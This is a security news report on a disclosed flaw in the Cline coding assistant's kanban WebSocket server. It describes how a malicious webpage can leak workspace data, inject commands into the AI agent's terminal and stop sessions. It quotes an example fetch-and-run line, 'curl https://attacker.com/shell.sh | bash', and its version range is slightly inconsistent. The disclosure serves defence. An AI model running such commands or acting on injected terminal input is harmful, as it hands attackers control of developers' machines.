A critical security vulnerability in the Cline AI coding assistant’s kanban package exposes developers to remote code execution, data theft, and denial-of-service attacks by simply visiting a malicious website.
Security researcher Sagilayani disclosed CVE-2026-44211 on GitHub four days ago, revealing that the kanban npm package bundled with the Cline CLI starts a WebSocket server on 127.0.0.1:3484 with zero Origin header validation.
The flaw carries a CVSS v3.1 score of 9.3 (Critical) and affects all versions before v2.13.0, with no patch currently available.
Cline AI Agent Flaw
Unlike standard HTTP requests, WebSocket connections bypass browser CORS protections entirely. This means any webpage a developer visits can silently connect to the local kanban server without restriction.
The attack unfolds in four stages:
- Info leak – A malicious webpage connects to ws://127.0.0.1:3484/api/runtime/ws and immediately receives a full snapshot of the developer’s workspace, including filesystem paths, git branch names, task titles, and live AI agent chat messages
- Session detection – The same WebSocket streams task_sessions_updated events, revealing when an AI agent session becomes active, along with its task ID and process ID
- Terminal hijack into RCE – The attacker connects to /api/terminal/io, injects an arbitrary prompt (e.g., curl https://attacker.com/shell.sh | bash) followed by a carriage return, and the AI agent executes it as a user command
- Task termination (DoS) – The /api/terminal/control endpoint allows the attacker to kill any running agent session with a simple {“type”: “stop”} message
All three vulnerable endpoints – /api/runtime/ws, /api/terminal/io, and /api/terminal/control – require no authentication and perform no Origin validation
The vulnerability stems from two weaknesses: CWE-306 (Missing Authentication for Critical Function) and CWE-1385 (Missing Origin Validation in WebSockets).
The server’s upgrade handler processes WebSocket connections without checking whether the request originates from the legitimate kanban UI or an external attacker-controlled page.
The attack requires only that the victim have Cline’s kanban server running and visit any attacker-controlled webpage; no additional user interaction is needed. The researcher confirmed the vulnerability across macOS, Linux, and Windows, tested on Firefox, Chrome, and Arc browsers.
- Confidentiality: Workspace paths, git data, and AI chat messages leak in real-time
- Integrity: Arbitrary shell commands execute inside the developer’s environment via terminal hijack
- Availability: Active agent tasks can be silently terminated at will
A proof-of-concept demonstrating the full attack chain, including a macOS native dialog as proof of execution, was published alongside the disclosure.
At the time of publication, no patched version of the kanban package exists. The researcher recommends three mitigations the Cline team should implement:
- Validate the Origin header on all WebSocket upgrade requests, rejecting non-localhost origins
- Generate a random secret token at server startup and require it as a query parameter on all WebSocket connections
- Add authentication checks to terminal WebSocket endpoints to verify the connecting client is the legitimate kanban UI
Developers using Cline v2.13.0 or earlier with the kanban feature enabled should avoid running the kanban server in untrusted network environments until a fix is released.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
